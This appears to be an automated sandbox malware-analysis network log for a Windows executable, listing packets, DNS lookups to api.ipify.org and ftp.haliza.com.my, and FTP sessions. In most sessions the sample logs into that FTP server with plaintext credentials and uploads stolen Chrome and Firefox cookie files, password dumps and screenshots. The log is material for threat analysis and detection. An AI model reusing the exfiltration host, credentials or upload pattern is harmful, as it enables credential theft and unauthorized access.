                                                  Oct 31, 2024 17:07:12.664998055 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:12.669954062 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:13.011112928 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:13.011244059 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:13.016138077 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:13.357491016 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:13.357772112 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:13.362725019 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:13.362835884 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:13.362838984 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:13.367765903 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.305254936 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.306050062 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.311084986 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311134100 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311147928 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311175108 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311187983 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311218977 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.311268091 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311280966 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311285973 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.311338902 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311355114 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311368942 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.311412096 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.311430931 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.311583996 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.316701889 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.316716909 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.316728115 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.316740990 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.316778898 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.316792011 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.316792965 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.316869020 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.317116022 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.317950010 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.321749926 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.321916103 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.322874069 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.322946072 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.323039055 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.323141098 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.323721886 CET5099063720110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:14.324059963 CET6372050990192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:14.353458881 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:15.123862028 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:15.179053068 CET6371821192.168.2.4110.4.45.197

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 31, 2024 17:03:01.551584005 CET5376953192.168.2.41.1.1.1
                                                  Oct 31, 2024 17:03:01.558679104 CET53537691.1.1.1192.168.2.4
                                                  Oct 31, 2024 17:03:03.027523994 CET5159253192.168.2.41.1.1.1
                                                  Oct 31, 2024 17:03:03.287842035 CET53515921.1.1.1192.168.2.4
                                                  Oct 31, 2024 17:03:31.826960087 CET5357516162.159.36.2192.168.2.4
                                                  Oct 31, 2024 17:03:32.449031115 CET5514253192.168.2.41.1.1.1
                                                  Oct 31, 2024 17:03:32.460637093 CET53551421.1.1.1192.168.2.4
                                                  Oct 31, 2024 17:04:57.484378099 CET5557953192.168.2.41.1.1.1
                                                  Oct 31, 2024 17:04:57.740012884 CET53555791.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 31, 2024 17:03:01.551584005 CET192.168.2.41.1.1.10xbb2aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Oct 31, 2024 17:03:03.027523994 CET192.168.2.41.1.1.10x4d82Standard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false
                                                  Oct 31, 2024 17:03:32.449031115 CET192.168.2.41.1.1.10x6e5Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                  Oct 31, 2024 17:04:57.484378099 CET192.168.2.41.1.1.10xcbdcStandard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 31, 2024 17:03:01.558679104 CET1.1.1.1192.168.2.40xbb2aNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 17:03:01.558679104 CET1.1.1.1192.168.2.40xbb2aNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 17:03:01.558679104 CET1.1.1.1192.168.2.40xbb2aNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 17:03:03.287842035 CET1.1.1.1192.168.2.40x4d82No error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 17:03:32.460637093 CET1.1.1.1192.168.2.40x6e5Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                  Oct 31, 2024 17:04:57.740012884 CET1.1.1.1192.168.2.40xcbdcNo error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • api.ipify.org

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449732104.26.12.2054436860C:\Users\user\Desktop\rMT103_126021720924.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 16:03:02 UTC155OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
                                                  2024-10-31 16:03:02 UTC211INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 16:03:02 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 14
                                                  Connection: close
                                                  Vary: Origin
                                                  cf-cache-status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 8db4df7369a7478a-DFW
                                                  2024-10-31 16:03:02 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
                                                  Data Ascii: 173.254.250.77


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449740104.26.12.2054437320C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 16:03:14 UTC155OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
                                                  2024-10-31 16:03:14 UTC211INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 16:03:14 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 14
                                                  Connection: close
                                                  Vary: Origin
                                                  cf-cache-status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 8db4dfbe6a46b787-DFW
                                                  2024-10-31 16:03:14 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
                                                  Data Ascii: 173.254.250.77


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449750104.26.12.2054437704C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 16:03:22 UTC155OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
                                                  2024-10-31 16:03:22 UTC211INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 16:03:22 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 14
                                                  Connection: close
                                                  Vary: Origin
                                                  cf-cache-status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 8db4dff18b124754-DFW
                                                  2024-10-31 16:03:22 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
                                                  Data Ascii: 173.254.250.77


                                                  FTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Oct 31, 2024 17:03:04.288233042 CET2149735110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 00:03. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Oct 31, 2024 17:03:04.288408041 CET4973521192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                  Oct 31, 2024 17:03:04.631843090 CET2149735110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                  Oct 31, 2024 17:03:04.631961107 CET4973521192.168.2.4110.4.45.197PASS JesusChrist007$
                                                  Oct 31, 2024 17:03:05.012732029 CET2149735110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                  Oct 31, 2024 17:03:05.357796907 CET2149735110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:03:05.358058929 CET4973521192.168.2.4110.4.45.197PWD
                                                  Oct 31, 2024 17:03:05.703283072 CET2149735110.4.45.197192.168.2.4257 "/" is your current location
                                                  Oct 31, 2024 17:03:05.703422070 CET4973521192.168.2.4110.4.45.197TYPE I
                                                  Oct 31, 2024 17:03:06.081101894 CET2149735110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:03:06.141598940 CET4973521192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:03:06.486332893 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,205,215)
                                                  Oct 31, 2024 17:03:06.493453026 CET4973521192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-494126_2024_10_31_12_23_02.txt
                                                  Oct 31, 2024 17:03:07.451021910 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:07.795377016 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.370 seconds (measured here), 8.85 Kbytes per second
                                                  Oct 31, 2024 17:03:07.795977116 CET4973521192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:03:08.142056942 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,194,218)
                                                  Oct 31, 2024 17:03:08.147679090 CET4973521192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-494126_2024_10_31_18_31_30.txt
                                                  Oct 31, 2024 17:03:09.053281069 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:09.630758047 CET2149735110.4.45.197192.168.2.4226 File successfully transferred
                                                  Oct 31, 2024 17:03:09.630774021 CET2149735110.4.45.197192.168.2.4226 File successfully transferred
                                                  Oct 31, 2024 17:03:16.086189985 CET2149741110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 50 allowed.220-Local time is now 00:03. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Oct 31, 2024 17:03:16.086504936 CET4974121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                  Oct 31, 2024 17:03:16.467320919 CET2149741110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                  Oct 31, 2024 17:03:16.479521990 CET4974121192.168.2.4110.4.45.197PASS JesusChrist007$
                                                  Oct 31, 2024 17:03:17.254580021 CET2149741110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                  Oct 31, 2024 17:03:17.255176067 CET2149741110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                  Oct 31, 2024 17:03:17.611933947 CET2149741110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:03:17.612101078 CET4974121192.168.2.4110.4.45.197PWD
                                                  Oct 31, 2024 17:03:17.973476887 CET2149741110.4.45.197192.168.2.4257 "/" is your current location
                                                  Oct 31, 2024 17:03:17.973634958 CET4974121192.168.2.4110.4.45.197TYPE I
                                                  Oct 31, 2024 17:03:18.330504894 CET2149741110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:03:18.331142902 CET4974121192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:03:18.688329935 CET2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,233,52)
                                                  Oct 31, 2024 17:03:18.695849895 CET4974121192.168.2.4110.4.45.197STOR PW_user-494126_2024_10_31_12_03_14.html
                                                  Oct 31, 2024 17:03:19.796546936 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:20.079937935 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:20.081404924 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:20.478665113 CET2149741110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.825 seconds (measured here), 423.21 bytes per second
                                                  Oct 31, 2024 17:03:20.501667976 CET4974121192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:03:20.859992981 CET2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,215,39)
                                                  Oct 31, 2024 17:03:20.865871906 CET4974121192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-494126_2024_10_31_19_41_17.txt
                                                  Oct 31, 2024 17:03:21.792996883 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:22.060389996 CET2149741110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:24.058864117 CET2149751110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 00:03. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 00:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Oct 31, 2024 17:03:24.065326929 CET4975121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                  Oct 31, 2024 17:03:24.406502008 CET2149751110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                  Oct 31, 2024 17:03:24.406656027 CET4975121192.168.2.4110.4.45.197PASS JesusChrist007$
                                                  Oct 31, 2024 17:03:24.772254944 CET2149751110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                  Oct 31, 2024 17:03:25.116749048 CET2149751110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:03:25.116878033 CET4975121192.168.2.4110.4.45.197PWD
                                                  Oct 31, 2024 17:03:25.484019995 CET2149751110.4.45.197192.168.2.4257 "/" is your current location
                                                  Oct 31, 2024 17:03:25.484165907 CET4975121192.168.2.4110.4.45.197TYPE I
                                                  Oct 31, 2024 17:03:26.006067991 CET2149751110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:03:26.006278992 CET4975121192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:03:26.225032091 CET4975121192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:03:26.264818907 CET2149751110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:03:26.267910004 CET2149751110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:03:26.604429960 CET2149751110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,236,195)
                                                  Oct 31, 2024 17:03:26.610862970 CET4975121192.168.2.4110.4.45.197STOR PW_user-494126_2024_10_31_12_03_22.html
                                                  Oct 31, 2024 17:03:27.637490988 CET2149751110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:27.988135099 CET2149751110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.469 seconds (measured here), 0.73 Kbytes per second
                                                  Oct 31, 2024 17:03:28.010612011 CET4975121192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:03:28.352710009 CET2149751110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,229,206)
                                                  Oct 31, 2024 17:03:28.358917952 CET4975121192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-494126_2024_10_31_18_51_47.txt
                                                  Oct 31, 2024 17:03:29.270622969 CET2149751110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:29.623159885 CET2149751110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.352 seconds (measured here), 9.31 Kbytes per second
                                                  Oct 31, 2024 17:03:29.623670101 CET4975121192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:03:29.966567039 CET2149751110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,210,153)
                                                  Oct 31, 2024 17:03:29.971963882 CET4975121192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-494126_2024_10_31_21_00_35.txt
                                                  Oct 31, 2024 17:03:31.271491051 CET2149751110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:31.274662018 CET2149751110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:31.606643915 CET2149751110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:03:31.948292017 CET2149751110.4.45.197192.168.2.4226 File successfully transferred
                                                  Oct 31, 2024 17:05:21.953092098 CET2163698110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 00:05. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 00:05. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 00:05. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 00:05. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Oct 31, 2024 17:05:21.953917027 CET6369821192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                  Oct 31, 2024 17:05:22.299539089 CET2163698110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                  Oct 31, 2024 17:05:22.300188065 CET6369821192.168.2.4110.4.45.197PASS JesusChrist007$
                                                  Oct 31, 2024 17:05:22.670706034 CET2163698110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                  Oct 31, 2024 17:05:23.017580986 CET2163698110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:05:23.017726898 CET6369821192.168.2.4110.4.45.197PWD
                                                  Oct 31, 2024 17:05:23.361634970 CET2163698110.4.45.197192.168.2.4257 "/" is your current location
                                                  Oct 31, 2024 17:05:23.361752987 CET6369821192.168.2.4110.4.45.197TYPE I
                                                  Oct 31, 2024 17:05:23.706084967 CET2163698110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:05:23.706178904 CET6369821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:05:24.049906015 CET2163698110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,208,32)
                                                  Oct 31, 2024 17:05:24.055854082 CET6369821192.168.2.4110.4.45.197STOR SC_user-494126_2024_11_28_12_11_27.jpeg
                                                  Oct 31, 2024 17:05:24.235661983 CET2163699110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 29 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 29 of 50 allowed.220-Local time is now 00:05. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 29 of 50 allowed.220-Local time is now 00:05. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 29 of 50 allowed.220-Local time is now 00:05. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 29 of 50 allowed.220-Local time is now 00:05. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Oct 31, 2024 17:05:24.236637115 CET6369921192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                  Oct 31, 2024 17:05:24.581289053 CET2163699110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                  Oct 31, 2024 17:05:24.581662893 CET6369921192.168.2.4110.4.45.197PASS JesusChrist007$
                                                  Oct 31, 2024 17:05:24.945266008 CET2163699110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                  Oct 31, 2024 17:05:24.950980902 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:05:25.335859060 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:05:25.336463928 CET2163699110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:05:25.336582899 CET6369921192.168.2.4110.4.45.197PWD
                                                  Oct 31, 2024 17:05:25.661079884 CET6369921192.168.2.4110.4.45.197PWD
                                                  Oct 31, 2024 17:05:25.752062082 CET2163699110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:05:25.752496004 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.753 seconds (measured here), 73.87 Kbytes per second
                                                  Oct 31, 2024 17:05:25.752521992 CET2163699110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:05:26.090719938 CET2163699110.4.45.197192.168.2.4257 "/" is your current location
                                                  Oct 31, 2024 17:05:26.092742920 CET6369921192.168.2.4110.4.45.197TYPE I
                                                  Oct 31, 2024 17:05:26.433299065 CET2163699110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:05:26.433572054 CET6369921192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:05:26.774559021 CET2163699110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,207,132)
                                                  Oct 31, 2024 17:05:26.783967972 CET6369921192.168.2.4110.4.45.197STOR SC_user-494126_2024_12_01_14_22_41.jpeg
                                                  Oct 31, 2024 17:05:27.924293995 CET2163699110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:05:27.924916983 CET2163699110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:05:28.706113100 CET2163699110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 1.002 seconds (measured here), 55.54 Kbytes per second
                                                  Oct 31, 2024 17:05:28.914628983 CET2163699110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 1.002 seconds (measured here), 55.54 Kbytes per second
                                                  Oct 31, 2024 17:05:48.176316023 CET6369921192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:05:48.516638994 CET2163699110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,223,195)
                                                  Oct 31, 2024 17:05:48.522939920 CET6369921192.168.2.4110.4.45.197STOR SC_user-494126_2024_12_14_16_26_31.jpeg
                                                  Oct 31, 2024 17:05:49.436495066 CET2163699110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:05:50.186172962 CET2163699110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.749 seconds (measured here), 74.25 Kbytes per second
                                                  Oct 31, 2024 17:05:59.932018995 CET6369921192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:00.461879015 CET2163699110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,245,80)
                                                  Oct 31, 2024 17:06:00.467493057 CET6369921192.168.2.4110.4.45.197STOR SC_user-494126_2024_12_21_20_32_59.jpeg
                                                  Oct 31, 2024 17:06:01.384572029 CET2163699110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:02.223412037 CET2163699110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.839 seconds (measured here), 66.31 Kbytes per second
                                                  Oct 31, 2024 17:06:04.858093023 CET6369921192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:05.200692892 CET2163699110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,195,233)
                                                  Oct 31, 2024 17:06:05.206432104 CET6369921192.168.2.4110.4.45.197STOR SC_user-494126_2024_12_26_02_07_59.jpeg
                                                  Oct 31, 2024 17:06:05.557142019 CET6369821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:05.909197092 CET2163698110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,194,40)
                                                  Oct 31, 2024 17:06:05.914978981 CET6369821192.168.2.4110.4.45.197STOR SC_user-494126_2024_12_28_13_12_01.jpeg
                                                  Oct 31, 2024 17:06:06.119796038 CET2163699110.4.45.197192.168.2.4150 Accepted data connection
